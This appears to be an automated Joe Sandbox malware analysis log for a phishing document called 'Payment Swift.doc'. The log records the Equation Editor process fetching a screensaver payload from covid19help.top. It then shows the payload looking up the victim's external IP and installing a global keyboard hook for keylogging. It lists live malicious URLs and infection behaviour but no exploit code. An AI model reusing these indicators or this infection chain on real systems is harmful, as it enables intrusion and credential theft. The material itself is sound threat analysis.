Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443

Source: Joe Sandbox View	IP Address: 104.21.83.128 104.21.83.128
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: C:\Users\user\AppData\Roaming\microme09255.scr	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\microme09255.scr	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\microme09255.scr	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET /microm.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F049A0BE-DDAA-4F28-9F33-B6FAFB134366}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /microm.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: covid19help.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: microme09255.scr, 00000006.00000002.883885788.000000000237E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.0000000005A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.0000000005A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000003.346863072.000000000426C000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1
Source: microme09255.scr.2.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform0Tran
Source: microme09255.scr.2.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/anonymous
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecision
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/country
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthxhttp://schemas.xmlsoap.org/ws/2005
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthyhttp://schemas.xmlsoap.org/ws/2005
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidrhttp://schemas.xmlsoap.org/ws/2005
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidshttp://schemas.xmlsoap.org/ws/2005
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressthttp://schemas.xmlsoap.org/ws/200
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressuhttp://schemas.xmlsoap.org/ws/200
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/homephone
Source: microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcode
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcodezhttp://schemas.xmlsoap.org/ws/2005/
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifier
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierzhttp://schemas.xmlso
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddress
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintshttp://schemas.xmlsoap.org/ws/2005/
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpage
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname~http://schemas.xmlsoap.o
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims~http://schemas.xmlsoap.org/ws/2005/05/identity
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/identity
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/rightzhttp://schemas.xmlsoap.org/ws/2005/05/identity/
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: microme09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: microme09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/microm.scr
Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/microm.scrC:
Source: EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/microm.scrY
Source: EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/microm.scrj
Source: EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/microm.scrkkC:
Source: EQNEDT32.EXE, 00000002.00000003.346877641.000000000061B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/t
Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown	HTTPS traffic detected: 104.21.83.128:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49162 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.microme09255.scr.344a420.5.raw.unpack, A1HZ.cs

.Net Code: _5O4

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\microme09255.scr

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Payment Swift.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
